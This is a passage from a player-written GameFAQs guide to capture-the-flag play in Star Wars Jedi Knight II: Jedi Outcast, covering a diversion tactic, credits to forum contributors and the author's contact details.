speed/RoF (why you can shoot guns faster than normal, I'm not sure). Right now, my favorite tactic is being the 1 man diversion. I'll usually max absorb/heal/push and just stall. It's amazing how many people will try to stack the odds. In a 7on7 CTF game, I had 5 members of the opposing team chasing me constantly. That left the bulk of my team to overpower the 2 remaining members and cap the flag. The basic idea is to just defend, and only attack when you have an extremely clear lightsaber shot. Absorb should be on, since their's almost always 1-2 guys that'll try to lightning/grip you despite having absorb on. This'll keep ur force up for awhile so you can heal and push the occasional gun toters explosive shots. Roll around alot if their are only lightsaber users chasing you (just don't roll INTO your opponent). You'll live 10x longer if you can keep rolling around. You won't live forever, but I've kept people tied up for 4-5 minutes sometimes :)" From CBrate: "Just one pet peeve of mine. If your team has a couple of first timers and other assorted newbs that ask questions (like me), answer them. Its better to have a halfway decent team than pride oneself on owning everyone else and still losing." _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 8. Credit/Props While I did write a lot of this on a whim one day, I never really thought too seriously of submitting it until I got the response. As it stands I believe the thread for this FAQ has the most posts on the GameFAQs message board, and everyone has been really supportive, whether they agreed with me or not. ;) First off I have to give Activision/LucasArts/Raven Software some major props for making such an awesome game. I haven't been so absorbed in a FPS since the original Jedi Knight. These people definitely stand out when I think of this FAQ, though: Tommatt--The first person to reply to my thread, and certainly one of the more enthusiastic ones about keeping it at the top of the list. Thank you! SeTSwiPe--Probably the one that caused me to rethink and change my strategies the most. I've since experimented with (and removed the degrading comments about ;) ) the Light Side, and he's the one that got me curious about this whole Dark Rage deal. I would have never tried Rage/Speed so quickly if it weren't for him. CrazyBallz--The only one of these three that I've actually managed to play with for a significant amount of time. Gave SeTSwiPe a hard time since he started posting on the thread, and proved to be almost as big of a dork as him with his *FORCE SPAM PUSH* ;) _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 9. Contact Information Got a strategy for CTF that you think is awesome? Like the CTF? Hate the CTF? Hate me when you get (cheaply) killed by me? Think I'm a LAMER? Contact me! GameFAQs message board thread: I'm TripleEej. You can tell because I've posted the most. E-mail: down0095@tc.umn.edu In JKII multiplayer: Search for TripleEej. I'll most likely be in a CTF server if I'm on. ;) Thank you for reading this!
http://www.gamefaqs.com/pc/516547-star-wars-jedi-knight-ii-jedi-outcast/faqs/16742
CC-MAIN-2014-52
refinedweb
5,909
80.92